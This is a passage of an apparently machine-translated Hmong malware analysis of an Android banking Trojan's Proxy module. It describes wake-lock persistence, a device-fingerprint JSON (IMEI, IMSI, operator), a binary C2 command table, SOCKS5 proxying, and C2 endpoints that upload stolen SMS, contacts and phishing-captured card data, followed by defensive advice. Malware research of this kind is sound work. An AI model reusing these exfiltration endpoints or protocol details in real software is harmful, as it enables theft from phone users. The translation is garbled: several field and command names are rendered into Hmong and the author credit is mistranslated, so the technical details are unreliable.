Cov kev zam uas tshwm sim thaum lub sijhawm ua haujlwm ntawm Proxy module kuj tau nkag mus rau hauv cov ntaub ntawv. Txhawm rau ua qhov no, daim ntawv thov tsim cov khoom JSON hauv hom hauv qab no:
{
"uncaughtException":<%short description of throwable%>
"thread":<%thread%>
"message":<%detail message of throwable%>
"trace": //Stack trace info
[
{
"ClassName":
"FileName":
"LineNumber":
"MethodName":
},
{
"ClassName":
"FileName":
"LineNumber":
"MethodName":
}
]
}Tom qab ntawd nws hloov nws mus rau ib txoj hlua sawv cev thiab teev nws.
Tus Proxy module tau pib tom qab tau txais cov lus txib sib xws. Thaum ib qho kev hais kom tso tawm Proxy module tau txais, daim ntawv thov pib qhov kev pabcuam hu ua MainService, uas yog lub luag haujlwm rau kev tswj hwm kev ua haujlwm ntawm Proxy module - pib thiab nres nws.
Cov theem pib ntawm kev pabcuam:
1. Pib lub timer uas khiav ib zaug ib feeb thiab xyuas cov haujlwm ntawm Proxy module. Yog tias lub module tsis ua haujlwm, nws pib nws.
Kuj thaum qhov xwm txheej tshwm sim android.net.conn.CONNECTIVITY_CHANGE Lub Proxy module tau pib.
2. Daim ntawv thov tsim lub wake-lock nrog cov parameter PARTIAL_WAKE_LOCK thiab ntes nws. Qhov no tiv thaiv lub cuab yeej CPU los ntawm kev mus rau hauv hom pw tsaug zog.
3. Launches cov lus txib ua chav kawm ntawm Proxy module, thawj zaug nkag rau kab mainLog("start server") ΠΈ
Server::start() host[<%proxy_cnc%>], commandPort[<%command_port%>], proxyPort[<%proxy_port%>]
qhov twg proxy_cnc, command_port thiab proxy_port - Cov tsis tau txais los ntawm Proxy server configuration.
Cov chav hais kom ua txheej txheem hu ua CommandConnection. Tam sim ntawd tom qab pib ua haujlwm, ua cov haujlwm hauv qab no:
4. Txuas rau ProxyConfigClass.host: ProxyConfigClass.commandPort thiab xa cov ntaub ntawv hais txog tus kab mob no nyob rau hauv JSON hom:
{
"id":<%id%>,
"imei":<%imei%>,
"imsi":<%imsi%>,
"model":<%model%>,
"manufacturer":<%manufacturer%>,
"androidVersion":<%androidVersion%>,
"country":<%country%>,
"partnerId":<%partnerId%>,
"packageName":<%packageName%>,
"networkType":<%networkType%>,
"hasGsmSupport":<%hasGsmSupport%>,
"simReady":<%simReady%>,
"simCountry":<%simCountry%>,
"networkOperator":<%networkOperator%>,
"simOperator":<%simOperator%>,
"version":<%version%>
}Qhov twg:
- id - tus neeg txheeb xyuas, sim kom tau txais tus nqi nrog "id" teb los ntawm Cov Ntaub Ntawv Kev Tshaj Lij Tshaj Lij hu ua "x". Yog tias tus nqi no tsis tuaj yeem tau, nws tsim ib qho tshiab. Yog li, Proxy module muaj nws tus kheej tus cim, uas yog tsim zoo ib yam li Bot ID.
- imei - IMEI ntawm lub cuab yeej. Yog hais tias qhov yuam kev tshwm sim thaum lub sij hawm tau txais tus nqi, cov lus yuam kev yuav raug sau es tsis txhob ntawm daim teb no.
- imsi β International Mobile Subscriber Identity of the device. Yog hais tias qhov yuam kev tshwm sim thaum lub sij hawm tus txheej txheem ntawm tau txais tus nqi, ib tug yuam kev ntawv xov xwm yuav muab sau es tsis txhob ntawm daim teb no.
- qauv - Lub npe kawg-neeg siv-pom pom rau cov khoom kawg.
- chaw tsim tshuaj paus - Cov chaw tsim khoom ntawm cov khoom / kho vajtse (Build.MANUFACTURER).
- androidVersion - ib txoj hlua hauv hom "<%release_version%> (<%os_version%>),<%sdk_version%>"
- lub teb chaws - qhov chaw tam sim no ntawm lub cuab yeej.
- PartnerId yog ib txoj hlua khoob.
- packageName β pob npe.
- NetworkType β hom kev sib txuas network tam sim no (piv txwv: "WIFI", "MOBILE"). Nyob rau hauv cov ntaub ntawv ntawm kev ua yuam kev, rov qab null.
- hasGsmSupport - tseeb - yog lub xov tooj txhawb GSM, txwv tsis pub dag.
- simReady β SIM card xeev.
- simCountry - ISO lub teb chaws chaws (raws li tus neeg zov me nyuam SIM).
- networkOperator - tus neeg teb xov tooj lub npe. Yog hais tias qhov yuam kev tshwm sim thaum lub sij hawm tau txais tus nqi, cov lus yuam kev yuav raug sau es tsis txhob ntawm daim teb no.
- simOperator β Tus Muab Kev Pabcuam Lub Npe (SPN). Yog hais tias qhov yuam kev tshwm sim thaum lub sij hawm tau txais tus nqi, cov lus yuam kev yuav raug sau es tsis txhob ntawm daim teb no.
- version - daim teb no yog khaws cia rau hauv chav kawm config; rau qhov kev sim versions ntawm bot nws yog sib npaug rau "1.6".
5. Hloov mus rau hom tos cov lus txib los ntawm lub server. Cov lus txib los ntawm lub server tuaj hauv hom:
- 0 offset - hais kom ua
- 1 offset β sessionId
- 2 offset - ntev
- 4 offset - cov ntaub ntawv
Thaum cov lus txib tuaj txog, daim ntawv thov teev npe:
mainLog("Header { sessionId<%id%>], type[<%command%>], length[<%length%>] }")
Cov lus txib hauv qab no los ntawm server yog ua tau:
| lub npe | Hais kom | Cov ntaub ntawv | Hauj lwm |
|---|---|---|---|
| kev sib txuasId | 0 | Kev sib txuas ID | Tsim kev sib txuas tshiab |
| TSO | 3 | Lub sij hawm | Ncua lub Proxy module |
| PING_PONG | 4 | - | Xa lus PONG |
Cov lus PONG muaj 4 bytes thiab zoo li no: 0x04000000.
Thaum tau txais cov lus txib connectionId (los tsim kev sib txuas tshiab) CommandConnection tsim ib qho piv txwv ntawm chav kawm ProxyConnection.
- Ob chav kawm koom nrog hauv proxying: ProxyConnection ΠΈ kawg. Thaum tsim ib chav kawm ProxyConnection txuas rau qhov chaw nyob ProxyConfigClass.host: ProxyConfigClass.proxyPort thiab dhau qhov khoom JSON:
{
"id":<%connectionId%>
}Hauv kev teb, tus neeg rau zaub mov xa SOCKS5 cov lus uas muaj qhov chaw nyob ntawm cov chaw nyob deb nroog uas qhov kev sib txuas yuav tsum tau tsim. Kev cuam tshuam nrog lub server no tshwm sim hauv chav kawm kawg. Kev teeb tsa kev sib txuas tuaj yeem ua schematically sawv cev raws li hauv qab no:
Kev sib tham hauv network
Txhawm rau tiv thaiv kev txheeb xyuas tsheb los ntawm kev sib txuas lus sniffers, kev sib cuam tshuam ntawm CnC server thiab daim ntawv thov tuaj yeem tiv thaiv siv SSL raws tu qauv. Tag nrho cov ntaub ntawv kis tau los ntawm thiab mus rau server yog nthuav tawm hauv JSON hom. Daim ntawv thov ua tiav cov lus thov hauv qab no thaum ua haujlwm:
- http://<%CnC%>/api/v1/set_state.php - qhov tshwm sim ntawm qhov hais kom ua.
- http://<%CnC%>/api/v1/get.php - tau txais ib qho lus txib.
- http://<%CnC%>/api/v1/load_sms.php - rub tawm SMS lus los ntawm lub cuab yeej muaj kab mob.
- http://<%CnC%>/api/v1/load_ab.php - uploading ib daim ntawv teev cov neeg sib cuag los ntawm ib tug muaj mob.
- http://<%CnC%>/api/v1/aevents.php - qhov kev thov yog ua thaum hloov kho cov tsis nyob hauv cov ntaub ntawv nyiam.
- http://<%CnC%>/api/v1/set_card.php - uploading cov ntaub ntawv tau siv lub qhov rais phishing masquerading li Google Play Market.
- http://<%CnC%>/api/v1/logs.php - uploading cov ntaub ntawv teev tseg.
- http://<%CnC%>/api/v1/records.php - upload cov ntaub ntawv tau los ntawm phishing windows.
- http://<%CnC%>/api/v1/set_error.php - ceeb toom ntawm qhov yuam kev uas tau tshwm sim.
tswv yim pom zoo
Txhawm rau tiv thaiv lawv cov neeg siv khoom los ntawm kev hem thawj ntawm lub xov tooj ntawm tes Trojans, cov tuam txhab yuav tsum siv cov kev daws teeb meem uas tso cai rau lawv saib xyuas thiab tiv thaiv kev ua phem yam tsis tau txhim kho software ntxiv rau cov neeg siv khoom siv.
Txhawm rau ua qhov no, kos npe txoj hauv kev txhawm rau txheeb xyuas cov xov tooj ntawm tes Trojans yuav tsum tau ntxiv dag zog nrog cov thev naus laus zis los tshuaj xyuas tus cwj pwm ntawm ob tus neeg siv khoom thiab daim ntawv thov nws tus kheej. Kev tiv thaiv kuj tseem yuav suav nrog kev txheeb xyuas cov cuab yeej ua haujlwm siv cov cuab yeej ntiv tes digital, uas yuav ua rau nws nkag siab tias thaum twg ib tus account raug siv los ntawm cov cuab yeej atypical thiab twb tau poob rau hauv txhais tes ntawm tus neeg dag.
Lub hauv paus ntsiab lus tseem ceeb yog qhov muaj cov kev txheeb xyuas hla-channel, uas tso cai rau cov tuam txhab los tswj cov kev pheej hmoo tshwm sim tsis yog hauv Is Taws Nem, tab sis kuj nyob rau hauv xov tooj ntawm tes, piv txwv li, hauv cov ntawv thov kev lag luam hauv xov tooj, rau kev lag luam nrog cryptocurrencies thiab lwm yam. kev pauv nyiaj tuaj yeem ua tau.
Txoj cai kev nyab xeeb rau cov neeg siv:
- tsis txhob nruab cov ntawv thov rau lub xov tooj ntawm tes nrog Android OS los ntawm lwm qhov chaw uas tsis yog Google Play, ua tib zoo saib xyuas cov cai thov los ntawm daim ntawv thov;
- tsis tu ncua nruab Android OS hloov tshiab;
- them sai sai rau qhov txuas ntxiv ntawm cov ntaub ntawv rub tawm;
- tsis txhob mus ntsib cov kev xav tsis zoo;
- Tsis txhob nyem rau ntawm qhov txuas tau txais hauv SMS lus.
Starring Semyon Rogacheva, junior specialist in malware research at the Group-IB Computer Forensics Laboratory.
Tau qhov twg los: www.hab.com